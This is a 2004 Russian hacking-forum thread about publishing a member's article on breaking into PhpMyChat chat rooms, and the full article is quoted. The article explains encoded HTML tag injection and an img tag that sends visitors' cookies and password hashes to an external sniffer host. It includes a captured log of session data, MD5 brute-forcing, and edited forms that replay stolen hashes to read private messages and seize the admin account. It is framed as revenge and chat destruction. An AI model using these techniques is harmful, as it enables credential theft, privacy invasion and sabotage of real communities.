</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (~Ice_night_BeTeP~ @ августа 16 2004,23:13)</td></tr><tr><td id="QUOTE">Я сёня ночью постараюсь написать ! Часам к 8 думаю она у тя уже будет ! ЧЕ ! или может на мыло послать ?[/QUOTE]<span id='postcolor'> Айс, у тебя же все готово уже! Тока выкинь все лишнее оттуда и шли на личную почту Алголу. Молодец!!!
html то наверное нада самому придумывать ! или Алгол сам напишет html и мне надо просто ему скинуть саму статью ?
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (~Ice_night_BeTeP~ @ августа 16 2004,23:43)</td></tr><tr><td id="QUOTE"> html то наверное нада самому придумывать ! или Алгол сам напишет html и мне надо просто ему скинуть саму статью ?[/QUOTE]<span id='postcolor'> Не обязательно придумывать хтмл. Просто отправь этот текст </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE"> Конечно самая главная уязвимость это пропуск тэгов в чат . С помощью её можно сломать и чат и пароль как любово юзверя тиак и админа . Но с кажым днём всё больше админов прикрывают это . Но есть и другие уязвимости ! По идее идеального чата нет . Везде есть дыры . Даже на самого умного админа найдётся 37117 HaX0r уменее его ! [/QUOTE]<span id='postcolor'> и скажи чтоб вместо старой статьи вывесил. Да, и еще... вместо цифр 37117 надо написать какие-нибудь другие, чтобы запоминалось легче..
По-моему, элита это 31337 ... А из этой статьи ты выкинь все лишнее, проверь грамотность и отправиь в личку алголу ... Он сам хтмл версию оформит и опубликует ...
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Че Гевара @ августа 17 2004,11:54)</td></tr><tr><td id="QUOTE">По-моему, элита это 31337 ... А из этой статьи ты выкинь все лишнее, проверь грамотность и отправиь в личку алголу ... Он сам хтмл версию оформит и опубликует ...[/QUOTE]<span id='postcolor'> Мож и енто элита ! Я в хакере последнм видел что 37117
~Ice_night_BeTeP~, если честно, то мы с джазом над тобой просто шутили ... Ты наверное не понял нашей иронии) Просто когда ты написал 1 топик - мы не поняли и решили поприкалываться ... Кто знал, что ты большую напишешь ? </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE"> Лом чат by ~Ice_night_BeTeP~ Даров хацкер ! Всё ещё сидишь на обломе потому что модер Вася тебя кикнул ? Как бы отомстить ему ...Пароль свой он на все твои усиля тебе усиленно не говорит .А может мы и без спросу возьмём ?Итак поехали ! 1 . Обзор уязвимостей . Конечное самая больльшая уязвимость в чатах это действие тэгов в чатах где эта возможность на 100% прикрыта ( я такие даж не встречал ) взлом затягивается и требует применить более сложные варианты . Все примеры я буду описывать на простом среднестатистическом чате назовём его http://www.chat.ru следует добавить что уязвимости будут описаны в чатах PhpMyChat . Начнём с простого . Для начала ищем какие тэги бут приниматся чатом обычно это что то вроде : \x3cfont color=#800080\x3e 123 \x3c/font\x3e ну что кто нить увидел тут знакомое ? Правильно это перекодированый тэг <font color=#800080> 123 </font> Вот мы изменили цвет сообщений . Если ты читаешь это что бы научится использовать тэги то можешь идити курушить чат , мы же с вами пойдём дальше .Бывает что чат не пропускает такой тэг ( ну аж тэги со знаками < ; > даже в самам убитом чате не катят). Тогда можно попробовать так \\x3cfont color=#800080\\x3e 123 \\x3c/font\\x3e есть чаты которые пропускают тэги ввиде \\76font color=#800080\\78 123 \\76/font\\78 ( Я точно не помню каие цифры .Если это твой случай смотри на форуме ) Спообов написания очень много и каждый может найти свой для своего чата . Но всё же чаще всего пропускаются вот такие тэги : \x3cfont color=#800080\x3e 123 \x3c/font\x3e . Если ты хочешь сам создать тэг из любого html тэга то запомни \x3c = < ; \x3e = > ; \x3a = : ; Но как использовать способность пропускать тэги в чат нам ? Очень просто ! Допустим нам надо пароль модера Васи На анитчате есть снифер , я говорю о тэгах , Страничка со снифером в расширении .jpg . 1+2+3= Мы должны написать тэг который выводит каритнку ( догадались какую ? )) Тэг это очень простой для тех кому лень делать енто самому вот он : \x3cimg src="http\x3a//antichat.ru/cgi-bin/s.jpg" name="imaga"\x3e . Теперь все чатланцы у нас на крючке . Открой лог снифера и ты увидишь что то подобное этому : [Mon Aug 16 13:46:01 2004]IP: 212.44.64.110 REFERER: http://www.chat.ru/index.php?showtopic=232&st=100 QUERY: CookieIp=212.44.64.110; hotlog=1; session_id=4c90b06a09398290533bb68ed3d3067e; member_id=133; pass_hash=2a9ea35253dbec60e76166ec8420fbda; topicsread=a:13:{i:33;i:1092649127;i:616;i:1092649397;i:232;i:1092649558;i:433;i:1092646760;i:580;i:1092646763;i:430;i:1092646827;i:588;i:1092646852;i:596;i:1092646877;i:585;i:1092646879;i:486;i:1092646969;i:555;i:1092647046;i:473;i:1092647622;i:31;i:1092648000;}; forum_read=a:1:{i:10;i:1092647059;} Нас же интересует только hash=2a9ea35253dbec60e76166ec8420fbda берём енто и меняем на hash:2a9ea35253dbec60e76166ec8420fbda сохраняем в болокноте . Теперь качаем с анитичата прогу MD5Inside жмём открыть и указываем путь к нашему пределаному хэшу . Теперь зпходим Search>Mask attack>options и выбираем как будем брутить . Чаще весго пароль это цифры . Но всё же этот метод долг и эфективен только если пароль из цифр . О другом методе я раскажу дальше . 2. Читаем приват . Не знаю как тебе но мне всегда хотелось почитать что говорят другие . Тогда я понял нада чиать приват . После поиков я наткунился на скрипт такого содержания : <html> <head> <TD> <FORM ACTION="http://www.deafnet.ru/chat/index.phtml" METHOD="Post" AUTOCOMPLETE="ON"> <INPUT TYPE="hidden" NAME="From" VALUE="index.phtml"> <INPUT TYPE="hidden" NAME="Ver" VALUE="H"> <INPUT TYPE="hidden" NAME="L" VALUE="russian"> <INPUT TYPE="hidden" NAME="U" VALUE="kristi"> <INPUT TYPE="hidden" NAME="R" VALUE="Общая"> <INPUT TYPE="hidden" NAME="T" VALUE="2"> <INPUT TYPE="hidden" NAME="D" VALUE="40"> <INPUT TYPE="hidden" NAME="N" VALUE="40"> <INPUT TYPE="hidden" NAME="O" VALUE="2"> <INPUT TYPE="hidden" NAME="ST" VALUE="2"> <INPUT TYPE="hidden" NAME="NT" VALUE="2"> <INPUT TYPE="hidden" NAME="PWD_Hash" VALUE="1fbfb23351e3580651395ab721f5e935"> <!-- Ignored users list --> <INPUT TYPE="hidden" NAME="Ign" VALUE="Zara"> <!-- Last sent message or command (will be used for the '/!' command) --> <INPUT TYPE="hidden" NAME="M0" VALUE="L"> <INPUT TYPE="text" NAME="M" SIZE="80" MAXLENGTH="2299" VALUE=""> <!-- Addressee that will be filled when the user click on a nick at the users frame --> <INPUT TYPE="hidden" NAME="MsgTo" VALUE=""> <INPUT TYPE="hidden" NAME="u" VALUE="white"> <INPUT TYPE="hidden" NAME="sent" VALUE="4"> <INPUT TYPE="submit" NAME="sendForm" VALUE="Читать приват"> </TD> <TD> <TABLE BORDER=0 CELLPADDING=0 CELLSPACING=0> <TR> <td bgcolor="#000000"><a href="#" onclick="window.parent.ChangeColor('#000000','C1'; return false;"><img src="images/unselColor.gif" alt="#000000" name="C1" border="0" width="2" height="20" /></a></td> <td bgcolor="#e40b8c"><a href="#" onclick="window.parent.ChangeColor('#e40b8c','C51'; return false;"><img src="images/unselColor.gif" alt="#e40b8c" name="C51" border="0" width="2" height="20" /></a></td> </TR> </TABLE> </TD> <TD></FORM></TD> </TR> < </BODY> </HTML> Нам он конечно в таком виде не подойдёт поэтому открываем блокнот и начинаем его править . <FORM ACTION="http://www.deafnet.ru/chat/index.phtml" METHOD="Post" AUTOCOMPLETE="ON"> это мы заменяем на : <FORM ACTION="http://www.chat.ru/index.php"METHOD="Post"AUTOCOMPLETE="ON"> Так URL чата указали идём дальше . <INPUT TYPE="hidden" NAME="From" VALUE="index.phtml"> правим на <INPUT TYPE="hidden" NAME="From" VALUE="index.php"> Потом <INPUT TYPE="hidden" NAME="L" VALUE="russian"> так и оставляем ( енто язык чата ) <INPUT TYPE="hidden" NAME="U" VALUE="kristi"> - указываем ник <INPUT TYPE="hidden" NAME="R" VALUE="Общая"> - выбираем комнату ( я советую выбирать ту комнату где жертва тогда мы "вселимся" в неё ) <INPUT TYPE="hidden" NAME="PWD_Hash" VALUE="1fbfb23351e3580651395ab721f5e935"> - хэш жертвы как добыть я уже говорил . <INPUT TYPE="hidden" NAME="Ign" VALUE="Kristi"> - повторем ник Запускаем . Давим пимпу читать приват и о чудо ! Мы читаем приват !!! 3. Самый эфективный взлом паса Тебя наверное банили плохие админы ... доводили ковраные модераторы ...в своих мкчтах ты дкмал что если бы ты был админом то бывший админ сидел бы с простым ником а модеры в бане . Эх... как енто всё прекрасно . Но давай воплотим всё это в жизнь ! Для начала что бы забанить модеров , удалить базу пользователей , удалить комнату , посмотреть инфо о юзверях мы должны попасть а админку . Давим правую кнопку крыски и сохраняем html админки на харде , он выглядит примерно так : <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML dir="LTR"> <HEAD> <TITLE>Чат Ночного Странника</TITLE> <LINK REL="stylesheet" HREF="config/style.css.php3?Charset=windows-1251&medium=10&FontName=" TYPE="text/css"> <script TYPE="text/javascript" LANGUAGE="JavaScript1.1"> <!-- function get_focus() { window.focus(); document.forms['LoginForm'].elements['AUTH_USERNAME'].focus(); } // --> </SCRIPT> </HEAD> <BODY bgcolor="#CCCCCC" background="/images/bg.gif" onLoad="if (window.focus) get_focus();"> <CENTER> <BR> <FORM ACTION="http://www.gay.md/chat/admin.php3?L=russian&Link=1" METHOD="POST" AUTOCOMPLETE="OFF" NAME="LoginForm"> <P></P> <INPUT TYPE="hidden" NAME="L" VALUE="russian"> <INPUT TYPE="hidden" NAME="Link" VALUE="1"> <INPUT TYPE="hidden" NAME="LIMIT" VALUE=""> <TABLE BORDER=0 CELLPADDING=3 CLASS="table"> <TR> <TD ALIGN="CENTER"> <TABLE BORDER=0> <TR> <TH COLSPAN=2 CLASS="tabtitle">Вход</TH> </TR> <TR> <TD ALIGN="RIGHT" VALIGN="TOP" NOWRAP>Ваш ник :</TD> <TD VALIGN="TOP"> <INPUT TYPE="text" NAME="AUTH_USERNAME" SIZE=11 MAXLENGTH=10 VALUE="admin"> </TD> </TR> <TR> <TD ALIGN="RIGHT" VALIGN="TOP" NOWRAP>Ваш пароль :</TD> <TD VALIGN="TOP"> <INPUT TYPE="password" NAME="AUTH_PASSWORD" SIZE=11 MAXLENGTH=16 VALUE="0907a906d4eececb2c41f6a412cdf788"> </TD> </TR> </TABLE> <P> <INPUT TYPE="submit" VALUE="Входим" class="button"> </TD> </TR> </TABLE> </FORM> </CENTER> </BODY> </HTML> И как всегда мы запускаем туда свою фантазию и начинаем править всё енто . Для начала правим URL вот что у нас получится : <FORM ACTION="http://www.chat.ru/admin.php3?L=russian&Link=1" METHOD="POST" AUTOCOMPLETE="OFF" NAME="LoginForm"> Теперь правим ник : <TD ALIGN="RIGHT" VALIGN="TOP" NOWRAP>Ваш ник :</TD> <TD VALIGN="TOP"> <INPUT TYPE="text" NAME="AUTH_USERNAME" SIZE=11 MAXLENGTH=10 VALUE="ADMINISHE"> ( пример ) Теперь наконец пароль : <INPUT TYPE="password" NAME="AUTH_PASSWORD" SIZE=11 MAXLENGTH=16 VALUE="0907a906d4eececb2c41f6a412cdf788"> Для тех кто в танке 0907a906d4eececb2c41f6a412cdf788 это опять хэш только админа ! Дело в том что ты скажешь можно и в поле пароль и так прописать хэш и всё ! Я тоже так когда то думал но ошибался . Хэш это пароль в зашифровном виде так как когда мы вводим пароль и давим вход то пароль шифруется в html отправляется на какой то URL где он проверяется и если он не верный то нам приходит сообщение "Неправильный ник или пароль" но если паравильный мы в админке ! Значит всё что нам надо просто ввести хэш ( он же зашифровный пароль ) в html и всё ! Мы в админке . Что делать там ты наверное сам разберёшся . Мембер из нашей тимы BUGI таааааково там наделал что чат уже месяц не работает )) . Так злой модер Васька уже забанен чат изуродован , но всё же так охото стать админом ! Что бы всех банить налево и направо что бы все боялись ! Это очень просто ! Созраняем html егистрации профайла на винте приавим там всё как указоно выше . Уррра мы у админа редактим профайл ! Меняем там пас и логин и тд ( на вкус и цвет ) . Всё ты админ !!!! Только я советую админить в чатах где админ появляется редко примерно раз 2 месяца тогда ты будешь админить столько же ( до его появления ) . Обычно взлом админа и админство в чате когда старый админ в чате равняется ~20 минутам . Они перехватывают обратно ник ! Как я даже сам ещё не понял ( . Но после такого прикола админ обычно закрывает чат недельки на две ( иногда больше ) . Теперь результат ! 1. Мы хотели напакастить в чате мы это сделали . 2. Хотели читать приват читаем . 3. Хотели наказать модера наказали . 4. хотели стать админом стали . 5. И просто убили чат ! Конечно это не всё что я знаю ... может скоро вы увидите ещё кое что ... [/QUOTE]<span id='postcolor'> Думаю, что на революционную статью это не тянет, но ты можешь взять и рассмотреть конкретный чат и написать именно про него ... На форуме мы ее точно оставим ... Я сейчас даже создам топик, где мы будем рассматривать все примеры ... Не знаю, если ее доработать, убрать лишнее и рассматривать конкретно по чату - то может и выйдет статья ... Algol, нам как раз не хватает нормальных примеров взлома ... Думаю, что на сайте нужно создать целый раздел по этому случаю. Раздел можно назвать Практика Туда мы запихнем мою статью про взлом чата на хакер.ру, это доработанную статью, а дальше будем добавлят по мере "прибывания" ...
